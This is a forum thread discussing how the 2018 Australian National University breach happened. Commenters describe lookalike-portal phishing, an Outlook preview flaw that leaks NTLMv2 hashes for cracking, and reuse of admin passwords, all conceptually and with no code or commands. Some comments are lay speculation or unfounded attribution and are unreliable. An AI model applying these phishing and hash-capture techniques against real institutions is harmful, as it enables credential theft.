How Did The ANU Hack Happen?

shaybisc on 03/10/2019 - 18:16

"On November 9, 2018, the hackers sent an email to a senior staff member at the ANU.

Another staff member, who had access to their colleague's account, previewed the email but never clicked on it.

Inside a massive cyber attack on the Australian National University that risks compromising high-ranking officials across the globe.

Even though the email was deleted, it was too late to stop the hackers, who had already accessed the senior staff member's username, password and calendar."

https://www.abc.net.au/news/2019-10-02/the-sophisticated-anu…

I don't get it. How does that work? I know very little about IT security but I will have a wild guess - brain-numbing stupidity?

Computing

Related Stores

Australian National University
Australian National University

Comments

  • rompastompa on 03/10/2019 - 18:24
    +8

    The simplest ones basically just mimic the portal of their intranet.

    So, they'd go to ANU's webmail, then create a website that looks identical. They'd register a domain called anu.udsadfs.com, and set up the trap.

    They'd then find the senior staff members names / emails by visiting their public profiles. They then email out to one of them with something basic and wait for a reply.

    When they reply, they'll recreate their signature and then send out another email to someone else masking themselves as [email protected] with the correct signature, and ask them to view a particular intranet document. When they click on the link that's imbedded into the email, it'll take them to their intranet log in page which they've done countless times. Once they enter their details, they use those details to get in.

    It's harder now with two form authentication, as they'd have to accept it on their phone etc.

    Edit: FYI, I've never been to UNA's portal or researched them previously. It took a minute to get the above links from google.

    • Lurker on 03/10/2019 - 19:53

      Sorry , there was no clicking involved , according to
      https://www.abc.net.au/news/2019-10-02/anu-cyber-hack-how-pe…
      —- >
      "Merely previewing the email was enough for hackers to steal a username and password that opened the first door into the ANU network."

      I too wonder how that kind of previewing can get one hacked.

      Could you shed some light on that ?

      Thanks.

      Edit:
      Found the report on ANU hack , finally. Will read it to try to figure out how previewing could get one hacked.
      https://imagedepot.anu.edu.au/scapa/Website/SCAPA190209_Publ…

      • orangetrain on 04/10/2019 - 08:31

        From Malware and Tradecraft analysis

        The first phishing email was designed to be interaction-less and likely used some form of scripting. It is assumed the actor anticipated a high degree of security awareness on the part of the intended recipient. Unfortunately, a copy of this email was not recoverable, so further analysis is not possible. Subsequent phishing attachments were designed to harvest credentials and used similar scripts.

        And from lessons learnt

        Phishing awareness
        As noted throughout the timeline, phishing emails were a hallmark of the activities of the actor. The social engineering which underpinned these emails highlights the vigilance needed to protect users
        against this form of attack.16 Given the methods of the actor and the number of successfully phished users, it is clear to us that more effort is required to help drive awareness and safe user behaviours
        across the University community. ANU will focus significantly in this area as part of a broader investment in security culture efforts under the auspices of its forthcoming strategic information security
        strategy. Work has already commenced with awareness training for high-risk groups.
        In addition to security culture, we have invested in stronger safeguards for our mail gateway and are expediting the retirement of legacy mail systems. These measures have already resulted in better
        technical protection for our mail users, and further investment will follow under the strategic program.

        They're also going to implement 2FA. Seems like there's poor logging.

      • Beanvee on 04/10/2019 - 13:14
        +1

        They didn't spell it out in the report, but it was likely the CVE for Outlook preview pane remote execution https://threatpost.com/two-nasty-outlook-bugs-fixed-in-micro…

  • Ozbargainite on 03/10/2019 - 18:29
    +1

    China just playing the Western world for fools.

    • kahn on 03/10/2019 - 19:09
      +7

      WTF? Some unnamed analyst suspects the attack came China based purely on beliefs and offering no evidence and the ABC choose to report it uncritically.

      When there's no proof of who is responsible, the ABC are happy to point the finger at China. What utter garbage journalism.

      • iforgotmysocks on 03/10/2019 - 19:13
        +1

        Perhaps the analyst posted his opinion from a Huawei phone…

      • Diji1 on 03/10/2019 - 21:34

        Our failed two corporation mainstream media and the Government mouthpiece that is the ABC rarely report that the USA hacks it's closest allies as well as the rest of the world.

        • kahn on 03/10/2019 - 22:01

          The US government is on record stating that they will view any foreign cyber attack on themselves as an act of war.

  • kusama on 03/10/2019 - 18:43

    News I just heard said their network had more holes than swiss cheese.

    So probably had access many ways..

    ie A dumb network could have the same admin password on every pc which can be easy to get then traverse the rest of the network and get access to admin accounts.

  • Sergeant Salami on 03/10/2019 - 19:31
    +1

    The hackers went phishing and someone took the bait

  • thatonethere on 03/10/2019 - 19:46
    +7

    The theories above are true but not applicable to the ANU hack. Rather than speculating you can actually just read the report that ANU published publically.

    Essentially all it took was for a person who was a delegate to some else's mailbox to preview an malicous email in Outlook. The email exploited this flaw:

    https://www.nccgroup.trust/au/about-us/newsroom-and-events/b…

    Basically, the e-mail contains a link which gets the client to connect out using either SMB or WebDAV and attempt NTLMv2 authentication. This gets the attacker a hash that can be broken if the password is simple enough (I believe that simple enough in this case includes ALL 8-character passwords regardless of their complexity with a few days of computation on some good GPUs).

    Once they had those creds they were able to use them to start exploring the ANU network and targeted other people with similar emails.

    Here is the report you can read it yourselves

    https://imagedepot.anu.edu.au/scapa/Website/SCAPA190209_Publ…

  • No Username on 03/10/2019 - 20:11

    It could've been a deepbeef attack. As you can display HTML content in an email it allows the hacker to latch on to the device and capture information based on the permissions allowed.

  • plmko on 03/10/2019 - 20:19

    If a 'preview' is all it takes, that's pretty crazy. Outlook automatically previews the latest email in the inbox, it's not like you can't not see it when you open Outlook.

    • Diji1 on 03/10/2019 - 21:36
      -3

      People in this thread seem confused about the difference between clicking the email and previewing it.

      There isn't any difference, the preview involves opening the email to show you a preview.

    • pjetson on 03/10/2019 - 21:51

      I always set up outlook not to preview email. It's pretty easy.

  • [Deactivated] on 03/10/2019 - 20:38
    +1

    Even though the email was deleted, it was too late to stop the hackers, who had already accessed the senior staff member's username, password and calendar.

    Their article to explain how the hack works is explained by the university being hacked.

    I wouldn't dare hand in an essay this lazy even in high school.

    The writer obviously doesn't know how it works either.

  • The mikky on 03/10/2019 - 22:28

    I would guess that it was a phone, most phones by default accept the images from “trusted senders” so a spoofed email address meant the phone thought the email was trusted. So it was in the normal inbox, then they opened the email, which then downloaded the email and it’s images. Which also included a payload infecting their phone, then the hackers probably went from there. Phone was now infected, user them took it into the secure network. Or possibly something along those lines.

    That would be my guess.

    But the other responses before me probably know more than I, so there’s a good bet I am wrong as well.

    Or some one likes looking up porn on their network but they don’t want to admit that.

  • [Deactivated] on 03/10/2019 - 22:33

    For me it sounded like they got passwords from a phising attack. But the difference was that it was highly targeted. Hence called spear phising.
    With the information they got they were able to infiltrate the network and get more details required for further hacking.

    Also, they were very careful to remove any traces of their activity so they managed to continue the hack for a relatively long period undetected.

    I think it is scary to think how your information is potentially in the hands of other peoples decisions. Here a uni staff gave up passwords, which allowed for student data to be accessed.

  • pegaxs on 03/10/2019 - 22:35
    +2

    previewed the email but never clicked on it.

    Hahaha… nah, that didn't happen. The dick clicked on it. All the IT peeps know it. They'd all be like "nah, he (fropanity) clicked on it, for sure…"

    • [Deactivated] on 04/10/2019 - 08:20

      Can't blame em. When a man or woman runs out of penis enbigment pills, and you see a link for a good bargain, you click the fcuk out of it.

  • Davo1111 on 03/10/2019 - 23:07
    +1

    I dont believe the preview hack

    • [Deactivated] on 04/10/2019 - 08:22

      "It is just a pop-up, I swear."

  • Spectatie on 04/10/2019 - 11:08

    Haha, any details on how they organized IT security, insourced or outsourced? What companies involved? Do they teach cyber security there -lmao

Login or Join to leave a comment
Login Join